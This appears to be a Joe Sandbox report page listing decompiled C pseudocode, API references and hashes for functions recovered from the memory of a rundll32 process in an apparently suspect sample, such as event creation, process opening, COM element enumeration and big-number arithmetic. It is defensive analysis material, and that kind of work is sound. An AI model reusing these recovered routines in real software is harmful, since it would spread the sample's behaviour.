Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 5c68bbb3c2c43ed028b0b012edb50fff616d21abe06f6af63f704890ea2d06e4
Instruction ID: 538ed2d0afd3663d3fb2c74d5e1e7581211e1830b817f0f162f1fdb6a0de0aea
Opcode Fuzzy Hash: 5c68bbb3c2c43ed028b0b012edb50fff616d21abe06f6af63f704890ea2d06e4
Instruction Fuzzy Hash: CC21EC76900108FFDF21DFE5D9889EEBBB8FF48740B5044AAE501E7241E674AB45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B6D78 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6D78(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x44ba30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x44ba2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x44ba2f8 = _t6;
					 *0x44ba304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x44ba2f4 = _t7;
					if(_t7 == 0) {
						 *0x44ba2f4 =  *0x44ba2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x044b6d80
0x044b6d86
0x044b6d8d
0x00000000
0x044b6de7
0x044b6d8f
0x044b6d97
0x044b6da4
0x044b6da4
0x044b6de4
0x00000000
0x044b6de4
0x044b6da6
0x044b6da6
0x044b6dab
0x044b6dbd
0x044b6dc2
0x044b6dc8
0x044b6dce
0x044b6dd5
0x044b6dd7
0x044b6dd7
0x00000000
0x044b6dde
0x044b6da0
0x00000000
0x00000000
0x044b6da2
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,044B1D07,?), ref: 044B6D80
GetVersion.KERNEL32 ref: 044B6D8F
GetCurrentProcessId.KERNEL32 ref: 044B6DAB
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 044B6DC8
GetLastError.KERNEL32 ref: 044B6DE7

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: d85e668e5687fe264543f431df1a226051007c352275fd5137c6c08945c67c09
Instruction ID: 167e6f1fd4c0f10430bc0d0996ce8c8c5988b37c8125c6e96405bdb9127f2fcb
Opcode Fuzzy Hash: d85e668e5687fe264543f431df1a226051007c352275fd5137c6c08945c67c09
Instruction Fuzzy Hash: 6FF0C2B07403029BFF648F34A909B957BA4EB45701F11441AE692D63C0DB7EA841CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 044B2732 Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E044B2732(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x44ba348; // 0x9ad5a8
					_t5 = _t103 + 0x44bb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x44b9290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x44ba348; // 0x9ad5a8
												_t28 = _t109 + 0x44bb0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x44ba348; // 0x9ad5a8
														_t33 = _t79 + 0x44bb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x044b2737
0x044b2740
0x044b2741
0x044b2745
0x044b274b
0x044b2751
0x044b275a
0x044b2760
0x044b276a
0x044b276c
0x044b2772
0x044b2777
0x044b2782
0x044b2788
0x044b278d
0x044b28af
0x044b2793
0x044b2793
0x044b27a0
0x044b27a6
0x044b27ac
0x044b27b0
0x044b27b6
0x044b27c3
0x044b27c7
0x044b27cd
0x044b27d0
0x044b27d8
0x044b27d9
0x044b27dd
0x044b27e1
0x044b27e4
0x044b27e7
0x044b27ed
0x044b27f6
0x044b27fc
0x044b27fd
0x044b2800
0x044b2801
0x044b2802
0x044b280a
0x044b280b
0x044b280c
0x044b280e
0x044b2812
0x044b2816
0x00000000
0x00000000
0x044b281c
0x044b2825
0x044b282b
0x044b2835
0x044b2839
0x044b283b
0x044b2848
0x044b284c
0x044b2854
0x044b2859
0x044b286b
0x044b286d
0x044b2873
0x044b2873
0x044b287c
0x044b287c
0x044b287e
0x044b2884
0x044b2884
0x044b2887
0x044b288d
0x044b2890
0x044b2899
0x00000000
0x00000000
0x00000000
0x044b2899
0x044b27ed
0x044b27e7
0x044b27d0
0x044b289f
0x044b289f
0x044b28a5
0x044b28a5
0x044b28ab
0x044b28ab
0x044b28b4
0x044b28ba
0x044b28ba
0x044b2777
0x044b28c3

APIs

SysAllocString.OLEAUT32(044B9290), ref: 044B2782
lstrcmpW.KERNEL32(00000000,0076006F), ref: 044B2863
SysFreeString.OLEAUT32(00000000), ref: 044B287C
SysFreeString.OLEAUT32(?), ref: 044B28AB

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: d04b34acc16465359e225a7d0cf1a5783294a807eb42f26efbe5104d72edc5d3
Instruction ID: c4219c77b2576f19a2037fb9486059f814f713fee93824894dd8b8e12a2681e2
Opcode Fuzzy Hash: d04b34acc16465359e225a7d0cf1a5783294a807eb42f26efbe5104d72edc5d3
Instruction Fuzzy Hash: 44512A75D00A19EFCF00DBE8C8889EEB7B9FF89700B144699E955EB214D771AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B5B9D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 044B5BD8
SysFreeString.OLEAUT32(00000000), ref: 044B5CBD

Part of subcall function 044B2732: SysAllocString.OLEAUT32(044B9290), ref: 044B2782

SafeArrayDestroy.OLEAUT32(00000000), ref: 044B5D10
SysFreeString.OLEAUT32(00000000), ref: 044B5D1F

Part of subcall function 044B3A62: Sleep.KERNEL32(000001F4), ref: 044B3AAA

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 8db3c42be5b81a61510a2aec517f985250913699de27db12a4d7f19ce54cac5d
Instruction ID: a5e8802c969244e3315fcfbcf67b20d6480168beeaf106ba2a78cd8ded94377e
Opcode Fuzzy Hash: 8db3c42be5b81a61510a2aec517f985250913699de27db12a4d7f19ce54cac5d
Instruction Fuzzy Hash: 9B512A75500609AFDB01CFA9D844ADEB7BAFF88704F158429E945DB220DB75ED05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B1DE3 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E044B1DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E044B2FAB(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E044B1CC1(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E044B2920(_t101,  &_v428, _a8, _t96 - _t81);
					E044B2920(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E044B1CC1(_t101, 0x44ba1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E044B1CC1(_a16, _a4);
						E044B3ADA(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L044B824A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L044B8244();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E044B241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E044B2378(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E044B79CC(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x44ba1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x044b1de6
0x044b1df2
0x044b1df8
0x044b1dfd
0x044b1e01
0x044b1f73
0x044b1f77
0x044b1f77
0x044b1e07
0x044b1e0b
0x044b1e0f
0x044b1e12
0x044b1e1d
0x044b1e23
0x044b1e28
0x044b1e2b
0x044b1e45
0x044b1e54
0x044b1e60
0x044b1e6a
0x044b1e6f
0x044b1e71
0x044b1e74
0x044b1f2b
0x044b1f31
0x044b1f42
0x044b1f55
0x044b1f6b
0x00000000
0x044b1f70
0x044b1e7d
0x044b1e84
0x044b1e88
0x044b1e8e
0x044b1e90
0x044b1e92
0x044b1e94
0x044b1e96
0x044b1ea0
0x044b1ea5
0x044b1ea7
0x044b1ea9
0x044b1eaa
0x044b1eab
0x044b1eac
0x044b1eb3
0x044b1eba
0x044b1ebd
0x044b1ebd
0x044b1e8a
0x044b1e8a
0x044b1e8a
0x044b1ec5
0x044b1ecd
0x044b1ed9
0x044b1ede
0x044b1ede
0x044b1ee3
0x00000000
0x00000000
0x044b1ee5
0x044b1ee8
0x044b1ef5
0x00000000
0x00000000
0x044b1ef7
0x044b1ef7
0x044b1f04
0x044b1ede
0x044b1ee3
0x00000000
0x00000000
0x00000000
0x044b1ee3
0x044b1f0e
0x044b1f11
0x044b1f14
0x044b1f1b
0x044b1f1b
0x044b1f28
0x00000000
0x044b1f28
0x044b1e14
0x044b1e18
0x044b1e19
0x044b1e1b
0x00000000
0x00000000
0x00000000
0x044b1e1b
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 044B1E96
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 044B1EAC
memset.NTDLL ref: 044B1F55
memset.NTDLL ref: 044B1F6B

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: f15b6cf7dd0ade0e42915114a80064ca7fc306fc730781d57559d38a096135f7
Instruction ID: 398c26933dd85851ea5530384c8cb8a454babf0ea4943cd9108631b9264fd157
Opcode Fuzzy Hash: f15b6cf7dd0ade0e42915114a80064ca7fc306fc730781d57559d38a096135f7
Instruction Fuzzy Hash: B241E031A00219AFEF109F69DC94BEE7774EF45354F00406AB989A7281DBB0BE548BE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B498E Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E044B498E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x44ba310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x44ba348; // 0x9ad5a8
				_t3 = _t8 + 0x44bb87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E044B11C3(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x44ba34c, 1, 0, _t30);
					E044B6C2C(_t30);
				}
				_t12 =  *0x44ba2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E044B68BD() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E044B402A(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x44ba124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E044B7928(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x044b498f
0x044b4996
0x044b49a0
0x044b49a4
0x044b49aa
0x044b49b9
0x044b49c0
0x044b49c4
0x044b49d6
0x044b49d8
0x044b49d8
0x044b49dd
0x044b49e4
0x044b4a3b
0x044b4a3b
0x044b4a41
0x044b4a43
0x044b4a43
0x044b4a4d
0x044b4a51
0x044b4a63
0x044b4a63
0x044b4a67
0x044b4a6d
0x044b4a6d
0x00000000
0x044b49fd
0x044b4a02
0x044b4a0a
0x044b4a0e
0x044b4a12
0x044b4a12
0x044b4a1f
0x044b4a23
0x044b4a27
0x044b4a7c
0x044b4a82
0x044b4a82
0x044b4a35
0x044b4a39
0x044b4a70
0x044b4a72
0x044b4a75
0x044b4a75
0x00000000
0x044b4a72
0x044b4a39
0x00000000
0x044b4a23

APIs

Part of subcall function 044B11C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04E69D70,00000000,?,?,69B25F44,00000005,044BA00C,4D283A53,?,?), ref: 044B11F9
Part of subcall function 044B11C3: lstrcpy.KERNEL32(00000000,00000000), ref: 044B121D
Part of subcall function 044B11C3: lstrcat.KERNEL32(00000000,00000000), ref: 044B1225

CreateEventA.KERNEL32(044BA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,044B7187,?,?,?), ref: 044B49CF

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

WaitForSingleObject.KERNEL32(00000000,00004E20,044B7187,00000000,00000000,?,00000000,?,044B7187,?,?,?), ref: 044B4A2F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,044B7187,?,?,?), ref: 044B4A5D
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,044B7187,?,?,?), ref: 044B4A75

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: bc2ed98a4f83b7f72aac94bcc2103e92ba9a5f0eee68f1b3bdfe7999547352ba
Instruction ID: c68d80fd0e3869c32ce6d30b328547afb3b5962f2dec197a49c4060723290261
Opcode Fuzzy Hash: bc2ed98a4f83b7f72aac94bcc2103e92ba9a5f0eee68f1b3bdfe7999547352ba
Instruction Fuzzy Hash: D921B6325007116BEF315E699C44AEB72A9EB8CB15B05452BFDC1A7343DB65EC0186E8

Uniqueness

Uniqueness Score: -1.00%

Function 044B70D8 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E044B70D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E044B54BB(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E044B78BF(_t23);
						}
					}
					return _t38;
				}
				if(E044B3695(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x44ba34c, 1, 0,  *0x44ba3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E044B71B6(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E044B3472(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E044B3AC2(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E044B498E( &_v32, _t39);
					goto L13;
				}
			}

0x044b70d8
0x044b70e5
0x044b70eb
0x044b70ec
0x044b70ed
0x044b70ee
0x044b70ef
0x044b70f3
0x044b70ff
0x044b7103
0x044b718b
0x044b718b
0x044b718e
0x044b7190
0x044b7198
0x044b719e
0x044b71a1
0x044b71a1
0x044b719e
0x044b71ac
0x044b71ac
0x044b7116
0x044b7118
0x044b7118
0x044b712f
0x044b7133
0x044b7136
0x044b7141
0x044b7148
0x044b7148
0x044b7151
0x044b7155
0x044b7163
0x044b7157
0x044b7157
0x044b7158
0x044b7159
0x044b715a
0x044b715b
0x044b715c
0x044b715c
0x044b7168
0x044b716b
0x044b716f
0x044b7171
0x044b7171
0x044b7178
0x00000000
0x044b717a
0x044b717a
0x044b7187
0x00000000
0x044b7187

APIs

CreateEventA.KERNEL32(044BA34C,00000001,00000000,00000040,?,?,76DDF710,00000000,76DDF730), ref: 044B7129
SetEvent.KERNEL32(00000000), ref: 044B7136
Sleep.KERNEL32(00000BB8), ref: 044B7141
CloseHandle.KERNEL32(00000000), ref: 044B7148

Part of subcall function 044B71B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,044B7168,?,044B7168,?,?,?,?,?,044B7168,?), ref: 044B7290

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 7cace70d8da2b0110e1e6782a5a4ba747b93a63eb06654210beaba06706e985b
Instruction ID: ba271bce29c9dc2fa762fedc7df546f76dab1d9ffdfbb0d44d0f706f70916121
Opcode Fuzzy Hash: 7cace70d8da2b0110e1e6782a5a4ba747b93a63eb06654210beaba06706e985b
Instruction Fuzzy Hash: B7216572D00219ABEF20AFE58884CDF7779EB84355B05442BEA92A7300D634B9458BF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B264F Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E044B264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E044B6D63(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x044b265b
0x044b265f
0x044b2660
0x044b2661
0x044b2663
0x044b2665
0x044b2668
0x044b266d
0x044b2704
0x044b270b
0x044b270b
0x044b2676
0x044b267d
0x044b268d
0x044b268d
0x044b2693
0x044b2695
0x044b269a
0x044b26a3
0x044b26a9
0x044b26ae
0x044b26b9
0x044b26bd
0x044b26bf
0x044b26c0
0x044b26c9
0x044b26cd
0x044b26de
0x044b26cf
0x044b26d4
0x044b26d9
0x044b26e8
0x044b26e8
0x044b26bd
0x044b26ee
0x044b26f4
0x044b26f4
0x044b26fd
0x044b2702
0x044b2702
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 044B267D
lstrlenW.KERNEL32(?), ref: 044B26B3
memcpy.NTDLL(00000000,?,?,?), ref: 044B26D4
SysFreeString.OLEAUT32(?), ref: 044B26E8

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
